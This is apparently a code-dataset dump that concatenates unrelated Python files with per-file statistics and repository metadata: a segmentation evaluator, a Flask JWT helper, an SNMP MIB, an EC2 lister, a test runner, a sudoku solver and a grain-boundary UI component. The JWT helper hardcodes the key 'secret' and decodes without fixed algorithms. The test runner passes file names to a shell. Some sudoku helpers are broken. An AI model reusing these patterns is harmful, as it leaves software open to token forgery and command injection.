semantic segmentation...') sem_seg_base = os.path.join(args.data_dir, 'images', '10k', 'val') gt_fns = [os.path.join(args.data_dir, 'labels', 'sem_seg', 'sem_seg_val', fn[:-4] + '_train_id.png') for fn in os.listdir(sem_seg_base)] sem_seg_fns = [os.path.join(args.pred_dir, 'sem_seg', '{}.npy'.format(fn[:-4])) for fn in os.listdir(sem_seg_base)] pool = Pool(5) o = pool.imap_unordered(_eval_sem_seg, zip(gt_fns, sem_seg_fns)) tic = time.time() while len(o._items) < len(gt_fns): toc = time.time() finished = len(o._items) if finished > 0: print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r') time.sleep(10) pool.close() pool.join() evals = [i[1] for i in o._items] hist = np.sum(evals, axis=0) ious = per_class_iu(hist).tolist() classes = ['road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light', 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car', 
'truck', 'bus', 'train', 'motorcycle', 'bicycle', 'TOTAL'] ious.append(np.nanmean(ious)) print('[SEMANTIC]') [print(a, '\t\t', b) for a, b in zip(classes, ious)] print(','.join([str(i) for i in ious])) # drivable area if 'drivable' in tasks: print('Evaluating drivable...') drivable_base = os.path.join(args.data_dir, 'labels', 'drivable', 'drivable_val') gt_fns = sorted([os.path.join(drivable_base, d) for d in os.listdir(drivable_base)]) pred_drivable_base = os.path.join(args.pred_dir, 'drivable') drivable_fns = [os.path.join(pred_drivable_base, '{}.npy'.format(n.split('.')[0].split('/')[-1])) for n in gt_fns] pool = Pool(10) print(len(gt_fns), len(drivable_fns)) o = pool.imap_unordered(_eval_drivable, zip(gt_fns, drivable_fns)) tic = time.time() while len(o._items) < len(gt_fns): toc = time.time() finished = len(o._items) if finished > 0: print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r') time.sleep(10) pool.close() pool.join() drivable_evals = [i[1] for i in o._items] # if len(drivable_evals[0][0]) == 9: # lane_evals = np.mean([i[0] for i in drivable_evals], axis=0) # print('[LANE]\n[thresh=10] {} {} {}\n[thresh=5] {} {} {}\n[thresh=1] {} {} {}'.format(*lane_evals)) # for e in lane_evals: # print(e) drivable_hist = np.sum(drivable_evals, axis=0) drivable_ious = per_class_iu(drivable_hist[0]).tolist() drivable_ious.append(sum(drivable_ious[1:])/2) print('[DRIVABLE]\n[direct] {} [alt] {} [overall] {}'.format(*drivable_ious[1:])) for d in drivable_ious: print(d) if __name__ == '__main__': main()
39.336364
226
0.580772
593
4,327
4.055649
0.256324
0.024948
0.029106
0.029106
0.353015
0.332225
0.306445
0.245322
0.2079
0.2079
0
0.011523
0.257915
4,327
109
227
39.697248
0.737465
0.067945
0
0.282353
0
0
0.131545
0
0
0
0
0
0
1
0.047059
false
0
0.117647
0
0.2
0.117647
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82037678cf731a27de7b80202c8ec58995f0f61d
1,795
py
Python
jungle_book/auth/jwt.py
EmilTheSadCat/jungle-book-app
9b92ba8b889943ce3636a88d538a59ee339869f1
[ "MIT" ]
null
null
null
jungle_book/auth/jwt.py
EmilTheSadCat/jungle-book-app
9b92ba8b889943ce3636a88d538a59ee339869f1
[ "MIT" ]
null
null
null
jungle_book/auth/jwt.py
EmilTheSadCat/jungle-book-app
9b92ba8b889943ce3636a88d538a59ee339869f1
[ "MIT" ]
null
null
null
import jwt from flask import request, jsonify from datetime import datetime from dateutil.relativedelta import relativedelta from functools import wraps from jungle_book.user.models import User algorithm = "HS256" key = "secret" # TODO put this into env variables NOW = datetime.now() SIX_MONTHS_LATER = NOW + relativedelta(months=+6) def encode_jwt(payload): """Encode JWT token with HS256 hashing algorithm""" payload.update({ "exp": SIX_MONTHS_LATER, "iat": NOW }) token = jwt.encode( payload=payload, key=key, algorithm=algorithm ).decode('utf-8') return token def decode_jwt(token): """Decode JWT token""" decoded_token = jwt.decode(jwt=token, key=key) return decoded_token def validate_jwt(token): """Validate given JWT""" try: jwt.decode(jwt=token, key=key) except jwt.ExpiredSignatureError: return False return True def extend_jwt(token): """Returns new JWT if given token is valid""" if validate_jwt(token): payload = decode_jwt(token) new_token = encode_jwt(payload) return new_token else: return "Provided token is invalid." def token_required(f): @wraps(f) def decorated(*args, **kwargs): token = None if 'x-access-token' in request.headers: token = request.headers['x-access-token'] if not token: return jsonify({'message': 'Token is missing'}), 401 try: data = decode_jwt(token) user = User.query.filter_by(id=data['id']).first() except jwt.exceptions.DecodeError: return jsonify({'message': 'Token is invalid!'}), 401 return f(user, *args, **kwargs) return decorated
23.311688
65
0.627855
220
1,795
5.036364
0.372727
0.072202
0.075812
0.030686
0.090253
0.041516
0
0
0
0
0
0.01063
0.266295
1,795
76
66
23.618421
0.830676
0.086351
0
0.038462
0
0
0.077208
0
0
0
0
0.013158
0
1
0.115385
false
0
0.115385
0
0.423077
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
820477ca11e0ba3796ae1ed723f0175e4fd87448
2,035
py
Python
pysnmp/REMOTE-LOGIN-TRAP-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
11
2021-02-02T16:27:16.000Z
2021-08-31T06:22:49.000Z
pysnmp/REMOTE-LOGIN-TRAP-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
75
2021-02-24T17:30:31.000Z
2021-12-08T00:01:18.000Z
pysnmp/REMOTE-LOGIN-TRAP-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module REMOTE-LOGIN-TRAP-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/REMOTE-LOGIN-TRAP-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 20:47:32 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint") s5AgRemoteLoginIp, s5AgRemoteLoginStatus = mibBuilder.importSymbols("S5-AGENT-MIB", "s5AgRemoteLoginIp", "s5AgRemoteLoginStatus") remoteLoginTrap, = mibBuilder.importSymbols("S5-ROOT-MIB", "remoteLoginTrap") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") Counter64, Integer32, NotificationType, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Gauge32, IpAddress, MibIdentifier, NotificationType, ModuleIdentity, ObjectIdentity, Bits, TimeTicks, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Integer32", "NotificationType", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Gauge32", "IpAddress", "MibIdentifier", "NotificationType", "ModuleIdentity", "ObjectIdentity", "Bits", "TimeTicks", "Counter32") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") remoteLoginStatus = NotificationType((1, 3, 6, 1, 4, 1, 45, 1, 6, 2, 8) + (0,1)).setObjects(("S5-AGENT-MIB", "s5AgRemoteLoginIp"), ("S5-AGENT-MIB", "s5AgRemoteLoginStatus")) mibBuilder.exportSymbols("REMOTE-LOGIN-TRAP-MIB", 
remoteLoginStatus=remoteLoginStatus)
113.055556
515
0.786241
200
2,035
8
0.51
0.115
0.028125
0.03375
0.35375
0.23
0.23
0.23
0.23
0.23
0
0.049285
0.072727
2,035
17
516
119.705882
0.798622
0.165111
0
0
0
0
0.363905
0.063314
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
82063e18e59a0cf3835ff63d9115c425615a4eb0
877
py
Python
admin/aws/list_instances.py
biosimulations/hsds
bd5b659c4fcc60c4a2791b2f39750faaa9098d09
[ "Apache-2.0" ]
76
2019-01-03T18:14:01.000Z
2022-03-28T20:09:42.000Z
admin/aws/list_instances.py
biosimulations/hsds
bd5b659c4fcc60c4a2791b2f39750faaa9098d09
[ "Apache-2.0" ]
104
2019-01-01T17:09:52.000Z
2022-03-31T17:53:48.000Z
admin/aws/list_instances.py
biosimulations/hsds
bd5b659c4fcc60c4a2791b2f39750faaa9098d09
[ "Apache-2.0" ]
41
2019-01-30T13:58:16.000Z
2022-02-23T13:13:01.000Z
import boto.ec2 import config region = config.get("aws_region") conn = boto.ec2.connect_to_region(region) reservations = conn.get_all_instances() fields = ("id", "public ip", "private ip", "name", "subnet", "state") format_str = "{:<20} {:<16} {:<16} {:<16} {:<16} {:<12}" print(format_str.format(*fields)) sep = ('-'*12,) * 6 print(format_str.format(*sep)) for res in reservations: for inst in res.instances: name = '<none>' if 'Name' in inst.tags: name = inst.tags["Name"] if inst.ip_address is None: inst.ip_address = '<none>' if inst.private_ip_address is None: inst.private_ip_address = '<none>' if inst.subnet_id is None: inst.subnet_id = "<none>" print(format_str.format(inst.id, inst.ip_address, inst.private_ip_address, name, inst.subnet_id, inst.state))
32.481481
117
0.615735
123
877
4.219512
0.308943
0.104046
0.080925
0.115607
0.146435
0
0
0
0
0
0
0.024963
0.223489
877
26
118
33.730769
0.737151
0
0
0
0
0
0.136986
0
0
0
0
0
0
1
0
false
0
0.090909
0
0.090909
0.136364
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82073259142e93c2fdba09723427d60b8a6ec446
5,795
py
Python
src/regression.py
rahlk/Rosie
60dc9d6a5590cdfbafbcbb0a7285db4e496384cc
[ "MIT" ]
null
null
null
src/regression.py
rahlk/Rosie
60dc9d6a5590cdfbafbcbb0a7285db4e496384cc
[ "MIT" ]
null
null
null
src/regression.py
rahlk/Rosie
60dc9d6a5590cdfbafbcbb0a7285db4e496384cc
[ "MIT" ]
null
null
null
''' Created on Feb 8, 2017 This is the regression script the langlib project. It is meant to be run at the top level directory of the repository. ''' import copy,json from os import walk from os.path import exists,splitext from subprocess import Popen, PIPE from string import digits import difflib import sys #This is the location of the testfiles and manifest relative to the root directory. testfiles = "./testfiles/" manifest_file = "./MANIFEST" #This dict defines the translation from directory names in the "testfiles" directory to actual rosie pattern #i.e. csharp -> "cs.<pattern>" langs = { "java" : "java", "c" : "c", "cpp" : "cpp", "csharp" : "cs", "go" : "go", "javascript" : "js", "ruby" : "rb", "r" : "r", "bash" : "b", "vb" : "vb", "python" : "py", } #This array defines the actuals expected to be ran by the script. These are also the expected directory names #for associated tests under the testfiles/language i.e. each "comments" -> "./testfiles/<language>/comments/ tests = [ "comments", "dependencies", "functions", "classes", "structs", "strings" ] class HtmlPrinter: ''' This is a simple html printer used to write the various results table generated by run_tests to an html file. ''' def __init__(self,id): ''' Initializes the printer id : Numeric id of the test execution (test id). ''' self.ts = id self.file=open("./result" + str(self.ts) + ".html", 'w') def add_table(self,test,html): self.file.write("<h1>" + test + "</h1>") self.file.write(html) def close(self): self.file.close() def run_tests(): ''' This function iterates through all directories found under ./testfiles/ and executes tests if possible. The process is as follows: 1. Find directory in ./testfiles/, and verify if it maps to a value in the langs. Continue to step 2 if it does not or move to new directory. 2. Find a directory in the langs directory found in step 1, and verify if it maps to a test in the tests array. Continue to step 3 if it does not or move to a new directory. 3. 
Find a file in the test directory found in step 2. If the file is correctly named i.e <pattern name><numeric id>.<valid_extension> then strip the numeric id, and and the pattern name. 4. Verify that the input file has a corresponding json output file in ./testfiles/<lang>/output/<test>/. If it does continue to step 5 otherwise move to a new test file. 5. Execute the input file and compare the results to the output file. Fail the test if a difference is found, and print the diff using HTMLPrinter. 6. Move to new test file as appropriate and continue. ''' failures = 0 testCount = 0 printer = HtmlPrinter(sys.argv[1]) for test in tests: for lang,alias in langs.items(): base_path = testfiles + lang + "/input/" + test + "/" for (dirpath, dirnames, test_files) in walk(base_path): for test_file in test_files: resolved_input = dirpath + test_file resolved_output = splitext(resolved_input)[0].replace("input","output") + ".json" if not exists(resolved_input): continue if not exists(resolved_output): continue with open(resolved_output, 'rU') as vOut: test_file_name = splitext(test_file)[0] pattern = copy.copy(test_file_name) pattern = pattern.translate(None,digits) proc = Popen('rosie -manifest ' + manifest_file + ' -wholefile -encode json ' + alias + "." 
+ pattern + " " + resolved_input, stdout=PIPE, stderr=PIPE,shell=True) stdout = '' stderr = '' for line in proc.stdout: stdout += line for line in proc.stderr: stderr += line if(stderr != ''): print(stderr) try: json1 = json.loads(vOut.read()) json2 = json.loads(stdout) jsonOut1 = json.dumps(json1,indent=2, sort_keys=True) jsonOut2 = json.dumps(json2,indent=2, sort_keys=True) if jsonOut1 != jsonOut2: differ = difflib.HtmlDiff() printer.add_table(lang + " : " + test_file_name, ''.join(differ.make_file(jsonOut1.splitlines(True),jsonOut2.splitlines(True)))) failures += 1 print("-------------------------------------------------") print (test_file_name + " test failed for " + lang) except ValueError: failures += 1 print("-------------------------------------------------") print (test_file_name + " test failed for " + lang) testCount += 1 print("-------------------------------------------------") if(testCount == 1): print(str(testCount) + " test ran") else: print(str(testCount) + " tests ran") if(failures == 1): print(str(failures) + " test failed") else: print(str(failures) + " tests failed") print("-------------------------------------------------") printer.close() if(failures > 0): exit(1) if __name__ == '__main__': run_tests()
41.099291
186
0.534599
672
5,795
4.540179
0.327381
0.026221
0.019666
0.008522
0.069485
0.05703
0.05703
0.031465
0.031465
0.031465
0
0.010909
0.335634
5,795
140
187
41.392857
0.781558
0.30906
0
0.108696
0
0
0.133195
0.05079
0
0
0
0
0
1
0.043478
false
0
0.076087
0
0.130435
0.152174
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82075f1bc0f847438e1a50eb1984f6a6e589570a
4,727
py
Python
personal/sudoku_solver/sudoku_solver.py
jyodroid/python_training
7b17145faed6a005d44a08c2f72a60644705f1e1
[ "Unlicense" ]
null
null
null
personal/sudoku_solver/sudoku_solver.py
jyodroid/python_training
7b17145faed6a005d44a08c2f72a60644705f1e1
[ "Unlicense" ]
null
null
null
personal/sudoku_solver/sudoku_solver.py
jyodroid/python_training
7b17145faed6a005d44a08c2f72a60644705f1e1
[ "Unlicense" ]
null
null
null
# Class https://docs.python.org/3/tutorial/classes.html class SudokuSolver: def __init__(self, boxes, unitlist): self.boxes = boxes self.unitlist = unitlist # My solution def set_boxes_values(values): board = {} for index in range(len(self.boxes)): board[self.boxes[index]] = values[index] return board #Better solution def grid_values(self, values): assert len(values) == 81, "Input grid must be a string of length 81 (9x9)" return dict(zip(self.boxes, values)) # The elimination technique https://youtu.be/6rFOX2jHB2g #Adding Grid values with elimination technique so we can add possible values to grid def grid_all_posibilities(self, values): assert len(values) == 81, "Input grid must be a string of length 81 (9x9)" board = {} for index in range(len(self.boxes)): value = values[index] if value == ".": board[self.boxes[index]] = "123456789" else: board[self.boxes[index]] = value return board # Udacity solution def another_grid_all_posibilities(values): values = [] all_digits = '123456789' for c in grid: if c == '.': values.append(all_digits) elif c in all_digits: values.append(c) assert len(values) == 81 return dict(zip(self.boxes, values)) # Find board places with one digit element and discard from peers other options def __eliminate(self, values): units = dict((s, [u for u in self.unitlist if s in u]) for s in self.boxes) peers = dict((s, set(sum(units[s],[]))-set([s])) for s in self.boxes) solved_values = [box for box in values.keys() if len(values[box]) == 1] for box in solved_values: digit = values[box] for peer in peers[box]: values[peer] = values[peer].replace(digit, '') return values # Only choise technique: https://youtu.be/sSjYn-Kex1A def __only_choise(self, values): for unit in self.unitlist: for digit in '123456789': dplaces = [box for box in unit if digit in values[box]] if len(dplaces) == 1: values[dplaces[0]] = digit return values # Constraints propagation on solving puzzle def reduce_puzzle(self, values): stalled = False while not stalled: # Check how 
many boxes have a determined value solve_values_before = len([box for box in values.keys() if len(values[box]) == 1]) #Use eliminate strategy self.__eliminate(values) #Use Only choise strategy self.__only_choise(values) #Check how many boxes have a determined value to compare solve_values_after = len([box for box in values.keys() if len(values[box]) == 1 ]) #If no new values were added, stop the loop. stalled = solve_values_before == solve_values_after #Sanity check: return false if there is a box with zero available values: if len([box for box in values.keys() if len(values[box]) == 0]): return False return values # search strategy https://youtu.be/omveZu2gRLs def search(self, values): # "Using depth-first search and propagation, create a search tree and solve the sudoku." # First, reduce the puzzle using the previous function values = self.reduce_puzzle(values) if values is False: return False #Error propagation if all(len(values[s]) == 1 for s in self.boxes): return values # Solved # Choose one of the unfilled squares with the fewest possibilities n, s = min((len(values[s]), s) for s in self.boxes if len(values[s]) > 1) # Now use recursion to solve each one of the resulting sudokus, and if one returns a value (not False), return that answer! for value in values[s]: new_sudoku = values.copy() new_sudoku[s] = value attempt = self.search(new_sudoku) if attempt: return attempt def display(self, values, rows, columns): """ Display the values as a 2-D grid. Input: The sudoku in dictionary form Output: None """ width = 1+max(len(values[s]) for s in self.boxes) line = '+'.join(['-'*(width*3)]*3) for r in rows: print(''.join(values[r+c].center(width)+('|' if c in '36' else '') for c in columns)) if r in 'CF': print(line) return
37.220472
131
0.584303
623
4,727
4.369181
0.277689
0.046289
0.017634
0.018369
0.201323
0.190301
0.152094
0.152094
0.101396
0.101396
0
0.018938
0.318595
4,727
126
132
37.515873
0.826141
0.243072
0
0.2
0
0
0.036395
0
0
0
0
0
0.0375
1
0.125
false
0
0
0
0.2875
0.025
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820790042011984b310814afa864c57777d5d354
10,956
py
Python
crystal_toolkit/components/transformations/grainboundary.py
mkhorton/mp-dash-components
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
[ "MIT" ]
null
null
null
crystal_toolkit/components/transformations/grainboundary.py
mkhorton/mp-dash-components
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
[ "MIT" ]
5
2018-10-18T19:52:12.000Z
2018-11-17T19:02:49.000Z
crystal_toolkit/components/transformations/grainboundary.py
mkhorton/mp-dash-components
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
[ "MIT" ]
null
null
null
import dash
from dash import dcc
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.transformations.advanced_transformations import (
    GrainBoundaryGenerator,
    GrainBoundaryTransformation,
)

from crystal_toolkit.components.transformations.core import TransformationComponent
from crystal_toolkit.helpers.layouts import add_label_help


class GrainBoundaryTransformationComponent(TransformationComponent):
    """Dash UI component wrapping pymatgen's GrainBoundaryTransformation.

    Renders the numerical/choice inputs for the transformation kwargs and
    registers callbacks that keep the Σ (sigma) and rotation-angle dropdowns
    consistent with the chosen rotation axis and input structure.
    """

    @property
    def title(self):
        return "Make a grain boundary"

    @property
    def description(self):
        return """Create a grain boundary within a periodic supercell.

This transformation requires sensible inputs, and will be slow to run
in certain cases.

When using this transformation a new site property is added which
can be used to colour-code the top and bottom grains."""

    @property
    def transformation(self):
        return GrainBoundaryTransformation

    def options_layouts(self, state=None, structure=None):
        """Build the list of input widgets for the transformation's kwargs.

        Args:
            state: optional dict of current kwarg values; defaults below mirror
                GrainBoundaryTransformation's own defaults.
            structure: optional input structure, used to enumerate valid sigmas.

        Returns:
            List of Dash layout elements, in display order.
        """
        # NOTE(review): "max_search" and "quick_gen" are seeded in state but
        # have no corresponding input widget below — presumably intentional
        # (kept at their defaults); verify against TransformationComponent.
        state = state or {
            "rotation_axis": [0, 0, 1],
            "rotation_angle": None,
            "expand_times": 2,
            "vacuum_thickness": 0,
            "ab_shift": [0, 0],
            "normal": False,
            "ratio": None,
            "plane": None,
            "max_search": 20,
            "tol_coi": 1e-8,
            "rm_ratio": 0.7,
            "quick_gen": False,
        }

        rotation_axis = self.get_numerical_input(
            label="Rotation axis",
            kwarg_label="rotation_axis",
            state=state,
            # Fix: help text previously said "Maximum number of atoms allowed
            # in the supercell" — a copy-paste error from another control.
            help_str="""Rotation axis of the grain boundary, as a list of three integers.""",
            shape=(3,),
        )

        # sigma isn't a direct input into the transformation, but has
        # to be calculated from the rotation_axis and structure
        _, sigma_options, _ = self._get_sigmas_options_and_ratio(
            structure, state.get("rotation_axis")
        )

        sigma = dcc.Dropdown(
            id=self.id("sigma"),
            style={"width": "5rem"},
            options=sigma_options,
            value=sigma_options[0]["value"] if sigma_options else None,
        )
        sigma = add_label_help(
            sigma,
            "Sigma",
            "The unit cell volume of the coincidence site lattice relative to "
            "input unit cell is denoted by sigma.",
        )

        # likewise, rotation_angle is then a function of sigma, so
        # best determined using sigma to provide a default value:
        # this is initialized via a callback
        rotation_angle = self.get_choice_input(
            label="Rotation angle",
            kwarg_label="rotation_angle",
            state=state,  # starts as None
            help_str="""Rotation angle to generate grain boundary.
Options determined by your choice of Σ.""",
            style={"width": "15rem"},
        )

        expand_times = self.get_numerical_input(
            label="Expand times",
            kwarg_label="expand_times",
            state=state,
            help_str="""The multiple number of times to expand one unit grain into a larger grain.
This is useful to avoid self-interaction issues when using the grain
boundary as an input to further simulations.""",
            is_int=True,
            shape=(),
            min=1,
            max=6,
        )

        vacuum_thickness = self.get_numerical_input(
            label="Vacuum thickness /Å",
            kwarg_label="vacuum_thickness",
            state=state,
            help_str="""The thickness of vacuum that you want to insert between the two grains.""",
            shape=(),
        )

        ab_shift = self.get_numerical_input(
            label="In-plane shift",
            kwarg_label="ab_shift",
            state=state,
            help_str="""In-plane shift of the two grains given in units of the
**a** and **b** vectors of the grain boundary.""",
            shape=(2,),
        )

        normal = self.get_bool_input(
            label="Set normal direction",
            kwarg_label="normal",
            state=state,
            help_str="Enable to require the **c** axis of the top grain to be perpendicular to the surface.",
        )

        plane = self.get_numerical_input(
            label="Grain boundary plane",
            kwarg_label="plane",
            state=state,
            help_str="""Grain boundary plane in the form of a list of integers.
If not set, grain boundary will be a twist grain boundary. The plane
will be perpendicular to the rotation axis.""",
            shape=(3,),
        )

        tol_coi = self.get_numerical_input(
            label="Coincidence Site Tolerance",
            kwarg_label="tol_coi",
            state=state,
            help_str="""Tolerance to find the coincidence sites.
To check the number of coincidence sites are correct or not, you can
compare the generated grain boundary's sigma with expected number.""",
            shape=(),
        )

        rm_ratio = self.get_numerical_input(
            label="Site Merging Tolerance",
            kwarg_label="rm_ratio",
            state=state,
            help_str="""The criteria to remove the atoms which are too close with each other
relative to the bond length in the bulk system.""",
            shape=(),
        )

        return [
            rotation_axis,
            sigma,
            rotation_angle,
            expand_times,
            vacuum_thickness,
            ab_shift,
            normal,
            plane,
            tol_coi,
            rm_ratio,
        ]

    @staticmethod
    def _get_sigmas_options_and_ratio(structure, rotation_axis):
        """Enumerate valid sigmas for a rotation axis and lattice type.

        Args:
            structure: pymatgen Structure or None (cubic assumed if None).
            rotation_axis: sequence of three (coercible-to-)ints.

        Returns:
            Tuple of (sigmas dict mapping sigma -> rotation angles,
            dropdown options list or None, axial ratio or None).
        """
        rotation_axis = [int(i) for i in rotation_axis]

        lat_type = (
            "c"  # assume cubic if no structure specified, just to set initial choices
        )
        ratio = None
        if structure:
            sga = SpacegroupAnalyzer(structure)
            lat_type = sga.get_lattice_type()[0]
            # this should be fixed in pymatgen
            try:
                ratio = GrainBoundaryGenerator(structure).get_ratio()
            except Exception:
                ratio = None

        cutoff = 10
        # Dispatch on the first letter of the lattice type; each enumerator
        # takes a differently-named ratio kwarg, hence the explicit branches.
        if lat_type.lower() == "c":
            sigmas = GrainBoundaryGenerator.enum_sigma_cubic(
                cutoff=cutoff, r_axis=rotation_axis
            )
        elif lat_type.lower() == "t":
            sigmas = GrainBoundaryGenerator.enum_sigma_tet(
                cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio
            )
        elif lat_type.lower() == "o":
            sigmas = GrainBoundaryGenerator.enum_sigma_ort(
                cutoff=cutoff, r_axis=rotation_axis, c2_b2_a2_ratio=ratio
            )
        elif lat_type.lower() == "h":
            sigmas = GrainBoundaryGenerator.enum_sigma_hex(
                cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio
            )
        elif lat_type.lower() == "r":
            sigmas = GrainBoundaryGenerator.enum_sigma_rho(
                cutoff=cutoff, r_axis=rotation_axis, ratio_alpha=ratio
            )
        else:
            return [], None, ratio

        options = []
        subscript_unicode_map = {
            0: "₀",
            1: "₁",
            2: "₂",
            3: "₃",
            4: "₄",
            5: "₅",
            6: "₆",
            7: "₇",
            8: "₈",
            9: "₉",
        }
        for sigma in sorted(sigmas.keys()):
            # Render e.g. Σ5 as "Σ₅" using unicode subscript digits.
            sigma_label = "Σ{}".format(sigma)
            for k, v in subscript_unicode_map.items():
                sigma_label = sigma_label.replace(str(k), v)
            options.append({"label": sigma_label, "value": sigma})

        return sigmas, options, ratio

    def generate_callbacks(self, app, cache):
        """Register the callbacks that keep sigma/rotation-angle dropdowns in sync."""
        super().generate_callbacks(app, cache)

        @app.callback(
            Output(self.id("sigma"), "options"),
            [Input(self.get_kwarg_id("rotation_axis"), "value")],
            [State(self.id("input_structure"), "data")],
        )
        def update_sigma_options(rotation_axis, structure):
            # Recompute valid sigmas whenever the rotation axis changes.
            rotation_axis = self.reconstruct_kwarg_from_state(
                dash.callback_context.inputs, "rotation_axis"
            )
            if (rotation_axis is None) or (not structure):
                raise PreventUpdate
            structure = self.from_data(structure)
            _, sigma_options, _ = self._get_sigmas_options_and_ratio(
                structure=structure, rotation_axis=rotation_axis
            )
            # TODO: add some sort of error handling here when sigmas is empty
            return sigma_options

        @app.callback(
            Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"),
            [
                Input(self.id("sigma"), "value"),
                Input(self.get_kwarg_id("rotation_axis"), "value"),
            ],
            [State(self.id("input_structure"), "data")],
        )
        def update_rotation_angle_options(sigma, rotation_axis, structure):
            # The admissible rotation angles are those enumerated for the
            # currently selected sigma.
            if not sigma:
                raise PreventUpdate
            rotation_axis = self.reconstruct_kwarg_from_state(
                dash.callback_context.inputs, "rotation_axis"
            )
            if (rotation_axis is None) or (not structure):
                raise PreventUpdate
            structure = self.from_data(structure)
            sigmas, _, _ = self._get_sigmas_options_and_ratio(
                structure=structure, rotation_axis=rotation_axis
            )
            rotation_angles = sigmas[sigma]
            options = []
            for rotation_angle in sorted(rotation_angles):
                options.append(
                    {"label": "{:.2f}º".format(rotation_angle), "value": rotation_angle}
                )
            return options

        # TODO: make client-side callback
        @app.callback(
            [Output(self.id("sigma"), "value"), Output(self.id("sigma"), "disabled")],
            [
                Input(self.id("sigma"), "options"),
                Input(self.id("enable_transformation"), "on"),
            ],
        )
        def update_default_value(options, enabled):
            if not options:
                raise PreventUpdate
            return options[0]["value"], enabled

        # TODO: make client-side callback, or just combine all callbacks here
        @app.callback(
            Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "value"),
            [
                Input(
                    self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"
                )
            ],
        )
        def update_rotation_angle_default(options):
            # Fix: this closure was previously also named "update_default_value",
            # shadowing the sigma-default callback above (F811). Registration
            # with Dash happens at decoration time, so the rename is behavior-safe.
            if not options:
                raise PreventUpdate
            return options[0]["value"]
34.670886
121
0.562705
1,179
10,956
5.049194
0.248516
0.060474
0.018814
0.022846
0.282043
0.219217
0.188812
0.178901
0.178901
0.162439
0
0.007671
0.345564
10,956
315
122
34.780952
0.822594
0.049379
0
0.205323
0
0
0.217918
0.002019
0
0
0
0.003175
0
1
0.038023
false
0
0.030418
0.011407
0.110266
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8209433689df2d1a57e76c64f9c9052b8c8371b0
2,871
py
Python
main.py
marcomaiermm/fishit
5c4992d91365ec9b841eaaa81848d4ad8a9af9ed
[ "MIT" ]
null
null
null
main.py
marcomaiermm/fishit
5c4992d91365ec9b841eaaa81848d4ad8a9af9ed
[ "MIT" ]
1
2021-06-08T21:07:25.000Z
2021-06-08T21:07:25.000Z
main.py
marcomaiermm/fishit
5c4992d91365ec9b841eaaa81848d4ad8a9af9ed
[ "MIT" ]
null
null
null
import imagesearch
import gui
import subprocess
import time

# from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import traceback, sys


class Thread(QThread):
    """Worker QThread that runs a callable off the GUI thread.

    If ``f`` is True the callable is treated as the Fishit class: it is
    instantiated with the global window ``w`` and its CheckArea() is run.
    Otherwise the callable is invoked with no arguments (used for the timer).
    """

